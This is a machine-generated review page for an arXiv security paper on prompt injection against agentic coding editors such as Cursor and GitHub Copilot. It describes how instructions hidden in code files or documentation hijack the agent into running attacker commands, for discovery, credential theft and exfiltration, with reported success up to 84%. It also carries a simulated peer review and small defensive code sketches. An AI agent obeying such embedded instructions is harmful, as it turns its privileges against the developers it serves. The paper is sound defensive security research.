
arxiv: 2509.22040 · v2 · submitted 2025-09-26 · 💻 cs.CR · cs.SE

"Your AI, My Shell": Demystifying Prompt Injection Attacks on Agentic AI Coding Editors

Pith reviewed 2026-05-18 13:16 UTC · model grok-4.3

classification 💻 cs.CR cs.SE
keywords prompt injection · agentic AI · coding editors · security vulnerabilities · MITRE ATT&CK · GitHub Copilot · Cursor · malicious command execution

The pith

Prompt injection attacks can hijack agentic AI coding editors by poisoning external resources to execute malicious commands.

A machine-rendered reading of the paper's core claim, the machinery that carries it, and where it could break.

The paper examines how attackers can exploit agentic AI coding editors such as Cursor and GitHub Copilot by embedding malicious instructions in external development resources such as code files or documentation. Because these editors hold elevated privileges to run terminal commands and interact with the host system, a hijacked agent can act with those same privileges. The authors built AIShellJack, a framework containing 314 attack payloads that cover 70 MITRE ATT&CK techniques, and used it to test the editors at scale. Reported success rates reach as high as 84 percent for getting the AI to run attacker-chosen commands, with objectives ranging from initial access to data theft. A sympathetic reader would care because these tools are increasingly used for automated coding workflows, so such hijacks could compromise developer environments without direct user action.

Core claim

By poisoning external resources with hidden instructions, attackers can remotely hijack the AI agents inside high-privilege coding editors, turning them into shells that execute malicious commands; large-scale tests with AIShellJack confirm this works at rates up to 84 percent across initial access, discovery, credential theft, and exfiltration objectives on GitHub Copilot and Cursor.

What carries the argument

AIShellJack, an automated testing framework that supplies 314 unique prompt injection payloads covering 70 MITRE ATT&CK techniques to evaluate how external resources can influence AI agent behavior in coding editors.
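
To make the payload and technique bookkeeping concrete, here is a minimal sketch of how a payload catalog and its coverage tally could be represented. The `Payload` class, its fields, and the sample entries are illustrative assumptions, not AIShellJack's actual data model; the technique IDs are real MITRE ATT&CK identifiers, and the commands are harmless placeholders.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Payload:
    """One attack payload (hypothetical schema, not the paper's)."""
    technique_id: str   # MITRE ATT&CK technique, e.g. "T1082"
    description: str    # natural-language instruction shown to the agent
    command: str        # command the agent is expected to run (placeholder here)


def coverage(payloads):
    """Return (number of unique payloads, number of distinct techniques)."""
    unique = set(payloads)  # frozen dataclasses are hashable, so duplicates collapse
    techniques = {p.technique_id for p in unique}
    return len(unique), len(techniques)


# Toy catalog for illustration only.
catalog = [
    Payload("T1082", "Print basic system information.", "uname -a"),
    Payload("T1082", "Show the current hostname.", "hostname"),
    Payload("T1560.001", "Archive the docs folder.", "tar -cf docs.tar docs"),
    Payload("T1082", "Print basic system information.", "uname -a"),  # duplicate
]

n_payloads, n_techniques = coverage(catalog)
print(n_payloads, n_techniques)  # 3 2
```

Run over the real framework, a tally of this kind is what would produce the "314 unique payloads, 70 techniques" figures the paper reports.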

If this is right

  • Attackers gain remote initial access to development environments through the compromised AI without needing direct interaction.
  • System discovery, credential theft, and data exfiltration become achievable objectives via the hijacked agent.
  • The attacks succeed against real editors that grant terminal and system-level privileges for coding tasks.
  • Common external resources such as code files or documentation can serve as vectors for the injection.

Where Pith is reading between the lines

These are editorial extensions of the paper, not claims the author makes directly.

  • Developers using these editors might reduce risk by reviewing AI-proposed actions before execution or restricting access to untrusted external files.
  • Similar prompt injection risks could appear in other agentic AI tools that load external inputs and then perform autonomous actions.
  • Adding input validation or prompt isolation layers in future editor versions could block this class of attack.
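
The first mitigation above, reviewing AI-proposed actions before execution, can be sketched as a simple gate placed in front of the terminal. This is an assumed design rather than anything Cursor or GitHub Copilot is known to implement: the allowlist contents and the `is_allowed` function are hypothetical, and filtering by program name is deliberately coarse.

```python
import shlex

# Characters that let one command line chain, redirect, group, or substitute others.
SHELL_METACHARACTERS = set(";|&$`<>()\n")

# Hypothetical allowlist; a real deployment would choose its own.
DEFAULT_ALLOWLIST = frozenset({"git", "ls", "pytest"})


def is_allowed(command, allowlist=DEFAULT_ALLOWLIST):
    """Return True only for a single, simple command whose program is allowlisted."""
    if any(ch in SHELL_METACHARACTERS for ch in command):
        return False  # reject chaining, pipes, redirection, substitution
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False  # unbalanced quotes: refuse rather than guess
    return bool(tokens) and tokens[0] in allowlist


proposals = [
    "git status",
    "curl http://example.com/x | sh",
    "git status; rm -rf build",
]
for proposed in proposals:
    verdict = "run" if is_allowed(proposed) else "ask the user"
    print(f"{proposed!r}: {verdict}")
```

A gate like this only narrows the attack surface. An allowlisted program can still be abused through its own options, so anything that fails the check should fall back to explicit user confirmation rather than silent rejection or silent execution.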

Load-bearing premise

The AI agents will read and act on instructions placed inside external resources without any built-in checks that prevent harmful command execution.

What would settle it

Loading a deliberately poisoned external file into Cursor or Copilot and observing that the AI agent neither executes the embedded malicious command nor takes any action based on it.
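
One way to observe the outcome of such a test is a canary: the poisoned file asks for a harmless, easily detected side effect, and the harness checks for it afterwards. The sketch below covers only that check; the file name `pith_canary.txt` and the function `canary_triggered` are hypothetical, and the agent run itself is simulated by writing the file directly.

```python
import tempfile
from pathlib import Path


def canary_triggered(workspace, canary_name="pith_canary.txt"):
    """Return True if the canary file exists in the workspace after the agent run."""
    return (Path(workspace) / canary_name).exists()


with tempfile.TemporaryDirectory() as workspace:
    # Before any agent run the canary is absent.
    print(canary_triggered(workspace))  # False
    # Simulate an agent that obeyed the injected instruction.
    (Path(workspace) / "pith_canary.txt").write_text("executed")
    print(canary_triggered(workspace))  # True
```

An absent canary across repeated runs would count as evidence against the claim for that editor and configuration; a present canary shows the instruction was followed.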

Figures

Figures reproduced from arXiv: 2509.22040 by David Lo, Haoyu Wang, Ting Zhang, Yanjie Zhao, Yue Liu, Yunbo Lyu.

Figure 1. “Your AI, My Shell”: Prompt Injection Attack
Figure 2. Example of GitHub Copilot being manipulated
Figure 4. Overview of Our AIShellJack
Figure 5. Example Payload Construction and Injection for T1560.001.03
Figure 7. Attack Success Rates Across Different AI Cod…
Figure 8. Attack Success Rates Across Categories by…
Original abstract

Agentic AI coding editors driven by large language models have recently become more popular due to their ability to improve developer productivity during software development. Modern editors such as Cursor are designed not just for code completion, but also with more system privileges for complex coding tasks (e.g., run commands in the terminal, access development environments, and interact with external systems). While this brings us closer to the "fully automated programming" dream, it also raises new security concerns. In this study, we present the first empirical analysis of prompt injection attacks targeting these high-privilege agentic AI coding editors. We show how attackers can remotely exploit these systems by poisoning external development resources with malicious instructions, effectively hijacking AI agents to run malicious commands, turning "your AI" into "attacker's shell". To perform this analysis, we implement AIShellJack, an automated testing framework for assessing prompt injection vulnerabilities in agentic AI coding editors. AIShellJack contains 314 unique attack payloads that cover 70 techniques from the MITRE ATT&CK framework. Using AIShellJack, we conduct a large-scale evaluation on GitHub Copilot and Cursor, and our evaluation results show that attack success rates can reach as high as 84% for executing malicious commands. Moreover, these attacks are proven effective across a wide range of objectives, ranging from initial access and system discovery to credential theft and data exfiltration.

Editorial analysis

A structured set of objections, weighed in public.

Desk editor's note, referee report, simulated authors' rebuttal, and a circularity audit. Tearing a paper down is the easy half of reading it; the pith above is the substance, this is the friction.

Referee Report

2 major / 2 minor

Summary. The paper claims to conduct the first empirical analysis of prompt injection attacks on agentic AI coding editors like GitHub Copilot and Cursor. It introduces the AIShellJack framework containing 314 unique attack payloads covering 70 MITRE ATT&CK techniques and reports that these attacks achieve success rates up to 84% in executing malicious commands through poisoning external resources.

Significance. If the results are reproducible and the evaluation accounts for realistic agent behaviors, this study would significantly contribute to the understanding of security risks in emerging AI coding tools with system privileges. The systematic coverage of attack techniques from MITRE ATT&CK is a notable strength, providing a comprehensive view of potential threats.

major comments (2)
  1. The abstract and evaluation section report an 84% attack success rate, but the manuscript does not provide details on the total number of experiments conducted, the criteria for determining success (e.g., actual command execution verification), or controls for agent context selection mechanisms that might filter injected prompts from files like READMEs or configs.
  2. While 314 payloads are mentioned, there is insufficient description of how these payloads were designed to bypass potential safety layers in the AI agents, and whether the evaluation tested scenarios where the agent summarizes or ignores external content.
minor comments (2)
  1. Some sentences could be clarified regarding the distinction between traditional prompt injection and the specific context of agentic editors with terminal access.
  2. The paper would benefit from including raw data or anonymized logs as supplementary material to support the reported success rates.

Simulated Author's Rebuttal

2 responses · 0 unresolved

We thank the referee for their detailed and constructive review of our manuscript. We appreciate the opportunity to clarify aspects of our experimental methodology and will incorporate revisions to address the concerns raised.

Point-by-point responses
  1. Referee: The abstract and evaluation section report an 84% attack success rate, but the manuscript does not provide details on the total number of experiments conducted, the criteria for determining success (e.g., actual command execution verification), or controls for agent context selection mechanisms that might filter injected prompts from files like READMEs or configs.

    Authors: We agree that these methodological details should be more explicitly documented to support reproducibility. In the revised manuscript, we will add a dedicated subsection in the Evaluation section specifying the total number of experiments performed, the success criteria (defined as verified execution of the malicious command via terminal output logging and environment state checks), and our approach to agent context handling. Our tests included direct poisoning of files such as READMEs and configuration files that agents were instructed to read in full, with observations that context selection did not systematically filter the injected prompts in the evaluated setups. revision: yes

  2. Referee: While 314 payloads are mentioned, there is insufficient description of how these payloads were designed to bypass potential safety layers in the AI agents, and whether the evaluation tested scenarios where the agent summarizes or ignores external content.

    Authors: We acknowledge that the payload design process merits expanded explanation. The 314 payloads were constructed by adapting established prompt injection patterns to the coding agent context and mapping them to 70 MITRE ATT&CK techniques, with specific elements such as indirect instruction overriding and role assumption included to navigate safety alignments. We will revise the AIShellJack framework description to provide concrete examples and rationale for these bypass strategies. Our evaluation did encompass scenarios in which agents were prompted to summarize or process external content (including cases where summarization occurred), and attack success was measured in those conditions as well; we will report these results separately in the revised evaluation to make this coverage explicit. revision: yes
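
The referee's request for explicit denominators and success criteria can be illustrated with a short tally. This is a sketch under stated assumptions: the `Trial` record, the rule that both the log check and the state check must pass, and the sample data are all hypothetical and are not taken from the paper or its reproduction package.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Trial:
    """Outcome of one injected payload against one editor (hypothetical record)."""
    category: str        # e.g. an ATT&CK tactic such as "discovery"
    seen_in_log: bool    # expected command appeared in the terminal log
    state_changed: bool  # expected side effect observed in the environment


def succeeded(trial):
    """Count a trial as a success only when both checks agree (an assumed rule)."""
    return trial.seen_in_log and trial.state_changed


def success_rates(trials):
    """Return {category: (successes, total, rate)} so denominators stay visible."""
    counts = defaultdict(lambda: [0, 0])
    for t in trials:
        counts[t.category][1] += 1
        if succeeded(t):
            counts[t.category][0] += 1
    return {c: (s, n, s / n) for c, (s, n) in counts.items()}


# Made-up trials, for illustration only.
trials = [
    Trial("discovery", True, True),
    Trial("discovery", True, False),
    Trial("exfiltration", True, True),
    Trial("exfiltration", False, False),
    Trial("exfiltration", True, True),
    Trial("exfiltration", True, True),
]
for category, (s, n, rate) in success_rates(trials).items():
    print(f"{category}: {s}/{n} = {rate:.0%}")
```

Reporting the triple rather than the percentage alone addresses the first major comment directly: a headline rate such as 84% is only interpretable alongside the number of trials behind it and the rule used to score each one.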

Circularity Check

0 steps flagged

No circularity: purely empirical measurement study with observed outcomes

This paper conducts an empirical evaluation of prompt injection attacks by implementing the AIShellJack testing framework and measuring attack success rates (up to 84%) on GitHub Copilot and Cursor through direct experimentation with 314 payloads. No equations, derivations, predictions, or first-principles results are present. There are no self-definitional elements, fitted inputs renamed as predictions, or load-bearing self-citations that reduce claims to inputs by construction. The central results are observed experimental outcomes from running attacks, making the study self-contained against external benchmarks such as actual editor executions. This is the expected finding for a measurement paper with no mathematical chain to inspect.

Axiom & Free-Parameter Ledger

0 free parameters · 1 axiom · 0 invented entities

The central claim rests on the empirical observation of attack success rather than new mathematical axioms or invented entities; the only notable assumption is that the tested editors will follow instructions from poisoned external sources.

axioms (1)
  • domain assumption: AI agents in coding editors will interpret and act on instructions found in external development resources as part of completing coding tasks.
    This premise is required for poisoning external resources to translate into command execution; it is stated implicitly in the attack model.

Forward citations

Cited by 3 Pith papers

Reviewed papers in the Pith corpus that reference this work. Sorted by Pith novelty score.

  1. Heimdallr: Characterizing and Detecting LLM-Induced Security Risks in GitHub CI Workflows

    cs.CR 2026-05 unverdicted novelty 8.0

    Heimdallr detects LLM-induced security risks in GitHub CI workflows by normalizing them into an LLM-Workflow Property Graph and combining triggerability analysis with LLM-assisted dataflow summarization, achieving ove...

  2. LogJack: Indirect Prompt Injection Through Cloud Logs Against LLM Debugging Agents

    cs.CR 2026-04 conditional novelty 7.0

    LogJack shows indirect prompt injection via cloud logs succeeds in making LLM agents execute remote code on 6 of 8 models, with most cloud guardrails failing to detect the attacks.

  3. Your Agent, Their Asset: A Real-World Safety Analysis of OpenClaw

    cs.CR 2026-04 conditional novelty 6.0

    Poisoning any single CIK dimension of an AI agent raises average attack success rate from 24.6% to 64-74% across models, and tested defenses leave substantial residual risk.
